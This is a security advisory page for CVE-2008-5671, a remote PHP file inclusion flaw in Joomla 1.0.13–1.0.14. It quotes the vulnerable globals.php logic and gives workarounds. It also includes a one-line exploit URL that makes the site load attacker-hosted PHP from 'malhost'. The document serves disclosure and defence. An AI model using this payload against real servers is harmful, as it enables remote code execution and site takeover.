|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  SecurityAlert Database |
||||
SecurityAlert : 4787 CVE : CVE-2008-5671 CWE : CWE-94 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : No Victim interaction required : No Exploit Available : Yes Credit : Hendrik Jan Verheij Published : 22.12.2008
Advisory Content : Affects: Joomla 1.0.13 - 1.0.14 Vulnerability: (remote) PHP file inclusion possible if old configuration.php Date: 14-feb-2008 Introduction: Remote PHP file inclusion is possible when RG_EMULATION is not defined in configuration.php. This is typical when upgrading from an older version, leaving configuration.php untouched. Furthermore, in PHP, register_globals must be 'off', for this exploit to work. In Joomla >=1.0.13, configuration.php-dist disables register_globals emulation, by defining RG_EMULATION false. In older Joomla versions, this was defined in globals.php instead. Users upgrading, without touching configuration.php (quite typical), will have RG_EMULATION unset, resulting in the following vulnerability. In Revision 7424 of globals.php, the 'configuration.php' file is included before registerGlobals() is called, allowing a malicious peer to override any value set in configuration.php. Details: Since revision 7424, globals.php includes 'configuration.php' if RG_EMULATION is unset, and enables RG_EMULATION by default for 'old configuration files': if( defined( 'RG_EMULATION' ) === false ) { if( file_exists( dirname(__FILE__).'/configuration.php' ) ) { require( dirname(__FILE__).'/configuration.php' ); } if( defined( 'RG_EMULATION' ) === false ) { // The configuration file is old so default to on define( 'RG_EMULATION', 1 ); } } The registerGlobals function is called *after* having included 'configuration.php': } else if (ini_get('register_globals') == 0) { // php.ini has register_globals = off and emulate = on registerGlobals(); Maliciously set GET variables cause variables set by configuration.php to be overwritten. Looking in index.php: require( 'globals.php' ); require_once( 'configuration.php' ); Since 'configuration.php' was already included by globals.php, the require_once() won't include the configuration.php again (leaving "attacker's" values untouched!). The exploit: http://joomlasite/index.php?mosConfig_absolute_path=http://malhost/php_s cript.txt Workaround: In index*.php and administrator/index*.php change: require_once( 'configuration.php' ); to require('configuration.php'); Or disable RG_EMULATION by using the line in configuration.php-dist in configuration.php: if(!defined('RG_EMULATION')) { define( 'RG_EMULATION', 0 ); } // Off by default for security Regards, Hendrik-Jan Verheij BWSS B.V. References : http://www.joomla.org/announcements/release-news/4609-joomla-1015-released.html
http://www.securityfocus.com/bid/27795
http://www.securityfocus.com/archive/1/archive/1/488199/100/200/threaded
http://www.securityfocus.com/archive/1/archive/1/488126/100/200/threaded  Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
» PHP 5.2.12/5.3.1 |
||
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |